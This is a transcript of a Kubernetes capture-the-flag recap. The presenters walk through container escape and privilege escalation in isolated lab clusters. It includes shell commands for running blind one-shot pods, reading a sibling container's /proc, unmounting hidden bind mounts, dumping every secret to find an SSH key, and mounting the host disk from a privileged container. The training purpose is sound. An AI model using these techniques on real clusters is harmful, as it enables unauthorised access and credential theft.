Hey, Andy, I think it's time for us to start doing this wrap-up talk. Fabulous and wonderful. Well, welcome to the Cloud Native Security Day CTF outro. Oh, he says outro, and this is the recap. Let's go to there instead. There we are. Welcome to the recap. We will do a post-cap recap decap, walk through what we did today, and go under the hood to explain some of the attacks.

Peace indeed is never an option for a naughty goose, and today we were off hunting clusters in the wild. But actually, it was not the public internet we were using. It was a far more constrained environment, whereby we stood everything up in order to practice and learn in a safe place. Every cluster had a bastion host, and every cluster was inaccessible from the public internet. So what were we trying to do? We were trying to avoid this kind of thing. But a little bit of frustration is a helpful learning tool, and by having a taskmaster available, and hopefully responsive enough, we looked to assuage some of those concerns.

So let's have a look at the spoilers. We do not have very long to get through all of these, so we're going to try and do them as quickly as possible and do a pwn-by-pwn demo of, well, as you say, everything that we were doing.

So we will start off, he says. Sorry, one second here. Yeah, so I think we're going to start off with scenario three, which is Avalon. Earlier on today, we had two separate Twitch streams. In the first Twitch stream, we went through scenario one. That'll be available for you to review. And then in the afternoon Twitch stream, we went through scenario five. So without further ado, I'll pass back to Mr. Andrew Martin to show us the way through scenario three, which was called Avalon.

Thank you very much. So the purpose of this is: we trust that, within our private networks, our own container registries hold code that we believe is safe to use. So we've deployed an image from our private registry.
But the pirates, Captain Hashjack and the nefarious crew, have taken the registry down, so we can no longer get images from it. But there's a secret in one of those deployed images. So let's have a look for the secret key to unlock the plug in the bottom of the captain's prize ship and hopefully scuttle it.

So we're in the Hashjack pod in the Avalon namespace. Well, what does that mean? As usual, let's just see what the mount points look like. Let's check df and see. OK. The first port of call in any Kubernetes escalation is the service account, so let's see what we've got available. We have kubectl installed, so we're probably in a container that was used internally by administrators to do something useful. And we will try and use it for something that's less than useful.

So let's see what access we've got. Well, we can hit the API server. We can see that we've got routing to these things. It is the Bitnami kubectl image. Thank you very much, Bitnami. That probably means it's relatively well configured from a file system perspective. What does that mean? It means that we're UID 1001, but group ID 0. Does that show us anything? Well, actually, there is no UID 1001 in this image, so our file system access is going to be difficult. It's also why we see "I have no name!": our username is resolved from /etc/passwd, and there's no resolution because we have no entry, no line in there.

OK, so we do have kubectl, and this is probably a bad day for cluster administrators. What pods do we have? OK. So we can see already that we've got three privateer pods. And if we try and do this across all namespaces (excuse me, that's not quite how you spell namespaces), then we can see here: we get a forbidden, and the API server has leaked our service account name and namespace back to us. So we can't list pods across all namespaces, fine. But we do have access to our own local namespace. So what do we know about the scenario?
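The opening recon described above can be sketched roughly like this. This is a sketch rather than a literal transcript of the demo: the service-account path is the Kubernetes default mount location, and the kubectl calls only make sense inside the cluster, so they are allowed to fail elsewhere.

```shell
# First moves inside a compromised pod: check identity, mounts, and
# what the pod's service account is allowed to do.
SA_DIR=/var/run/secrets/kubernetes.io/serviceaccount
ls "$SA_DIR" 2>/dev/null || true            # token, ca.crt, namespace
id                                          # uid=1001, gid=0 in the demo image
df -h                                       # always look at the mount points
kubectl get pods 2>/dev/null || true        # allowed: our own namespace
kubectl get pods --all-namespaces || true   # forbidden: the error message
                                            # leaks our service-account name
```

The forbidden error is itself useful reconnaissance: the API server names the service account and namespace it refused, which tells you exactly what identity you are operating as.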
Well, just going back to the beginning, we can see there's a secret in one of the deployed images. So we've got access to these pods; how do we find out what images they're running? We examine them as YAML, and we grep for the image key. There we go. That looks pretty hopeful: this container image is probably the one that we want.

So let's just see if we can exec straight in. kubectl exec, interactive session, allocate a pseudo-terminal, let's go into the privateer pod (oh, we don't have tab completion, let's fix that) and run sh. OK, so we do not have pods/exec. That's not very helpful when we want to read the contents of the image that the pod is running from. But we can do something slightly different, which is run the thing instead, and then see if that works.

OK, so we've managed to do something. And in fact, I've called the pod "sh", which is never a good look. Let's call it test-random. OK, so we're able to run, but we're not able to attach to the pod. That's not very useful. Let's just have a look again and see what pods we have. So here's the erroneously named pod, and here's the recently named one.

So what can we do here? Well, we're looking for something in the file system of a pod, or of an image, rather. We can't pull that image because it's from a private registry. So the only thing we can do here is to execute something inside the pod that will reveal unto us the actual flag on the file system. So let us say the pod is going to be called test, and we'll give it a random suffix using the bash built-in $RANDOM variable so that we get, excuse me, so that we get a different name each time. That's our pod name. And then the command we want to run is probably bash, and then let's just get our id. Once we've done that, give it a few seconds for the pod to start, then do a kubectl logs on the pod and just see what happens. So, three seconds, pod starting, hopefully. Pod apparently not starting. I wonder if I need those in there.
OK, maybe we'll try a slightly different approach to this. Why would that not work? So, Andy, the way that I did this earlier, instead of doing the sleep command, was just to write out those logs as you've done, but then kubectl logs on the pod and write it out to a dump file, /tmp/dump, and then cat it out from there. That's how I... That's a good idea.

So let's just... So we've named the pod something. The other thing we can do here while we're at it is just to turn debug mode on in bash to make sure that the command is as I think it is. OK, well, mystically, that worked. So let's just do a shell command, id, and make sure that we have something. OK, we may have to come back to this one, because I would expect this to reveal something to us, at least. Looks like we're just hanging with the invocation. Live demos, eh? Joy, joy of live demos, yeah. We spin up over... Well, I've just forgotten the number, but... ...the terminal too. OK, so it was because I tried to attach a terminal to it. So let's get back to where we were. Command: id. And then we'll pull the logs. So... OK, but we do need to leave a few seconds for the pod to actually start. This is a kind of blind injection attack against the pod.

There we go. So now we can execute commands within this one-shot container. In the interests of the time that I've wasted, which you will never get back, let's grep for the flag with my favorite one-liner. It looks a bit like this. So we're going to find something. Now, we happen to know that it's in the /tmp directory, to save us a little bit of time. And that, hopefully, should now dump out a flag if I'm being sensible. And as people have pointed out before, we don't have to use find here. We do have to... Oh, no, that's not correct. Sorry, we do want to search this. We could just grep from the root of the file system. OK, finally: /usr/share. "Never gonna give you up..." This smells of Lewis Denham-Parry's cluster tampering.
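The working technique that finally landed can be sketched as below: without the pods/exec permission, you launch a one-shot pod from the private image and read its stdout back through the logs API, a blind-injection pattern. The image name here is a placeholder for the private-registry image, and the kubectl calls need the cluster, so they are allowed to fail outside it.

```shell
# Blind command execution via a throwaway pod and the logs API.
IMAGE="private-registry-image"            # placeholder: the privateer image
POD="test-${RANDOM}"                      # bash $RANDOM: fresh name each run
kubectl run "$POD" --image="$IMAGE" --restart=Never \
  --command -- sh -c 'id; grep -Ri "flag" /tmp /usr/share 2>/dev/null' || true
sleep 3                                   # give the container time to start
kubectl logs "$POD" > /tmp/dump 2>/dev/null || true
cat /tmp/dump                             # the command's output, read blind
```

The key lesson from the demo: do not pass `-it` here. Attaching a terminal to a one-shot pod is what caused the hang; run it detached and collect the output from the logs afterwards.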
But there is our flag, finally, hidden in the depths of the local file system, and we've pulled that from inside the container. Now, that puts us slightly behind time, so let's see how quickly we can get through the next one. So whilst you get that next one set up, yes: that is my calling card, to Rickroll whenever I get into a cluster in these scenarios. Again, we're tight on time today, so we're going to see if we can get through the second one. But Andy, whenever you're ready to go, give me a shout.

I think we're going to go on to scenario four now. What is the name of that scenario when it's at home? It is Escalates. OK, there we go. So what are we doing here? The supply chain is compromised. Who would have thought such a thing? Captain Hashjack's motley crew have managed to get code merged into an application library that developers use. The library runs in a pod, and the attackers have then escalated, trying to find secrets on the host. So what do we know here? Well, we know that we have two unknown containers, and our starting point is in the process-audit pod.

So again, we'll just do the standard checks, just see what exists here. We have a service account. We don't have kubectl; we could install it, but let's look at some other things first. The process table is interesting. We can see here that we've got sleep infinity twice. The reason for this is that there are two containers in this pod, and for some reason the containers can see each other's init process. That is generally a bad day, because once we share process namespaces, we share /proc. And /proc gives us access to all the good stuff. So we can now see, for example, how that process was invoked. Actually, we need to do some null-byte fixing so it's visible. So we've got sleep infinity in there, so we know that it's process 11. Here's 11. Got the right one. OK, so what else could we look for in here?
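The /proc tricks used here can be sketched as follows. When containers share a process namespace, a sibling container's processes appear in our /proc, and cmdline and environ entries are NUL-delimited, so they need translating to newlines to be readable. In the demo the sibling's PID was 11; /proc/self works identically and is used here so the sketch runs anywhere.

```shell
# Reading a sibling process's details through a shared /proc.
PID=self                               # in the demo this was 11
tr '\0' '\n' < "/proc/$PID/cmdline"    # how the process was invoked
tr '\0' '\n' < "/proc/$PID/environ"    # its environment variables (in the
                                       # demo, the flag was hiding here)
ls "/proc/$PID/root/"                  # the process's entire root filesystem
```

`/proc/<pid>/root` is the real prize: it gives you the other container's full filesystem view, which is exactly what the next part of the walkthrough uses.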
Well, we have access to the entire root file system of that process, which of course is a joy for all to behold. Let's just go back and do an ls. OK, so there's some stuff in there, but that's not actually what we're looking for. Got some stuff in /tmp. But what are we looking for here? Well, actually in this case we are looking for something in the environment. So we're looking in the environment of the other container in the pod. There are two containers in this pod, and this one is giving us some useful information, perhaps. Again, things are null-byte delimited. And then, joy of all joys, there is something that looks suspiciously like a flag. Happy days. There we go. On to the next; in the last five minutes, I'm sure we can get it.

So whilst you get set up for that, some honorable mentions for today. We had Christophe, well, Christophe Epti, Noel Mahé, and you, Val, all just smashing through the scenarios. Thank you to Wallet as well, who is, I feel, the community support officer; thank you ever so much for the channel. Lena, thank you for being the most eager person, requesting a cluster 20 hours before the event started, but wholly awesome and safe as well. But at this point, Andy, you've got four minutes to do a hack.

Excellent. OK, so the cluster is almost about to die as well, because it's an old one. So what are we going to do? Well, the environment doesn't give us much. kubectl has no local config. OK, so in this case, again, I'd like to check the mount points. This is not something that we would expect to see. So let's unmount whatever is bind-mounted over /root/.kube and have a look. There's still nothing there. Why might that be? Because there are two bind mounts. OK, and then let's just double-check that the mounts are actually gone. Yeah, there's nothing there anymore. Bind mounts are just a way of hiding things on a file system. You can hide processes as well, but in this case we were hiding /root/.kube.
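The bind-mount unhiding step looks roughly like this. It needs root on the node, and the path is the one from the demo: /root/.kube was covered by two stacked bind mounts, so it takes two umounts before the real kubeconfig shows through. The umount and ls calls are allowed to fail when run outside that environment.

```shell
# Peeling stacked bind mounts off a hidden directory.
grep kube /proc/self/mounts || true       # spot the suspicious bind mounts
umount /root/.kube 2>/dev/null || true    # peel off the first mount...
umount /root/.kube 2>/dev/null || true    # ...and the second one underneath
ls -la /root/.kube 2>/dev/null || true    # the hidden kubeconfig reappears
grep kube /proc/self/mounts || true       # confirm the mounts are gone
```

The detection habit is the point: an unexpected entry in the mount table over a well-known path like ~/.kube is a strong hint that something is being hidden from you.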
And now we've got kubectl access. And there we go: we can route to the API server. So what is the point of this exercise, I hear you ask. What's the point of this exercise, Andy? It is to find where Hashjack has hidden his ill-gotten treasure in a hard-to-find place. OK, so first of all, we probably want to get onto the master, but we don't know how we can do that easily. Let's see if we can get any secrets. "Irredeemable villainy" and "the tritically pseudo-reminiscent" are both potential candidates, but of course, if we have access to all namespaces, let's just list across all of them. We can see there's a fair bit more in here. Noticeably, some of these controller tokens are masquerading: the name suggests a service account token, but it's not; that one was created by a human. In the same way, these default tokens, that's not how they should look. So, "subcompensatory super-average-ness": let's see if we can figure out which of these actually holds the token.

So what are we going to do? Let's get a secret. And I will be honest, Lewis, I'm not actually sure which is which. So what I did, Andy, when you dropped this one on me, was to go all namespaces, get secrets, -o yaml. Nice. And then just grep from that, because it'll give you everything. So grep for ssh, I think. Yeah. And there we go: it is something that looks a lot like a private key. Here's one that we made earlier. So we've now got a private key; let's stick that into an SSH identity file, I suppose.

And so maybe if we did an nmap, Andy, we would have found a certain port open. But again, to save you from doing it: if you curl the master IP on port 5678... So you've got the master IP from doing kubectl get nodes -o wide. And there you go, you've already done that. OK, so this is important information. Thank you very much. It's a message from our archetypal arch-adversary: follow the 22 white rabbits.
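The secret-hunting sequence described here can be sketched like so. The secret name, namespace, and the `id_rsa` data key are placeholders (the demo's names were deliberately misleading, which is why the YAML dump was grepped wholesale), and the kubectl calls are allowed to fail outside the cluster.

```shell
# Dump every secret, find the SSH key, and turn it into a usable identity.
kubectl get secrets --all-namespaces -o yaml > /tmp/secrets.yaml 2>/dev/null || true
grep -in ssh /tmp/secrets.yaml || true     # spot the interesting secret
SECRET="changeme" NS="changeme"            # fill in from the grep above
kubectl get secret "$SECRET" -n "$NS" \
  -o 'jsonpath={.data.id_rsa}' 2>/dev/null | base64 -d > /tmp/id_rsa
chmod 600 /tmp/id_rsa                      # ssh refuses keys with lax perms
kubectl get nodes -o wide 2>/dev/null || true  # the master's IP is listed here
```

Secret values in the API are base64-encoded, hence the decode step; and the chmod 600 is the classic gotcha that bites again a moment later in the walkthrough.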
So had we done this beforehand, we might then have thought about trying to find SSH keys, which at this point we have done, anachronistically. So we now have access to this. We also know from running kubectl version what the master IP is. Of course, we can get that from our local kubectl config as well, which is probably that much easier. There we go. So let's follow the captain onto the master node. And you've got about a minute as well, so wrap all this up. I'm going to go ahead and say yes. So that's permission denied, but that is because we're not using the right key. There's our SSH identity. And we hit the classic trick of not setting our permissions on the key file. OK, off we go. We're onto the master.

So at this point, what am I actually doing here? We need to inspect... We need to find that there is an image on there, controlplaneio/valiant-effort, and we want to inspect that image and find where the diff is. Nice. But we want to gain access to that diff, and to be able to do so... we don't have sudo access on this host. So if we remember back to the first scenario of today, we showed you how to get privileged access if you can run a privileged container. So we could just loop back to doing a docker run of a privileged container on our Kubernetes master, which would then allow us to mount the /dev/xvda1 device, the same thing that we did in scenario one today, which then allows us to traverse to the file system that the Docker image is within. And speed running, it really is.

So first of all, the /var/lib/docker location is on the host file system, which we're on, but it's owned by root. That means we have to escalate. We can do that through a container, or we can just mount the file system, as we're about to do here. So if we go into the host mount, there we go. Now we should have access to this. He says, access to this... Oh, yeah, thanks. OK, yes, it's the directory. And then proc/self/cmdline is the only file hidden in the container image.
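The privileged-container escalation recapped here, from scenario one, looks roughly like this. It is a sketch of the demo environment: the device name /dev/xvda1 and the controlplaneio/valiant-effort image are the demo's, and /var/lib/docker is only readable once you are effectively root.

```shell
# No sudo on the node? Run a privileged container and break out of it.
docker run -it --rm --privileged ubuntu bash
# -- inside the privileged container --
mount /dev/xvda1 /mnt            # mount the host's root disk
chroot /mnt                      # now operating as root on the host fs
# -- effectively root on the host --
docker image inspect controlplaneio/valiant-effort \
  --format '{{json .GraphDriver.Data}}'
# ls the UpperDir path that prints: the image's layer diff lives there,
# and the only file hidden inside it is proc/self/cmdline - the flag.
```

The underlying lesson is the one repeated all day: `--privileged` plus access to the Docker socket or CLI on a node is equivalent to root on that node.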
And therein lies the flag. That was a speed run and a half. There were a couple more that you can see on the live streams from earlier, and I hope that's been at least vaguely informative, if not a little bit too fast to follow. Thank you very much.

Have you got any slides? That's a good question. Just to say the thank-yous. That is an excellent point. And there are the thank-yous. Yes, indeed. Thank you to everybody who helped put everything together, and also to the organizers for the work done to make today smooth and speed-bump free, and to the ControlPlane folks who've been laboring on the back end, past and present. Thanks to you all. There is the great parting of the seas. Some attendees enjoyed themselves. And yes, of course, don't put Kubernetes API servers on the public internet. ControlPlane does this for a living. If you'd like us to run a CTF for you, or indeed you'd like to attend some of the SANS training courses, then please do reach out through the relevant channels. And thank you very much for playing. Have a wonderful day.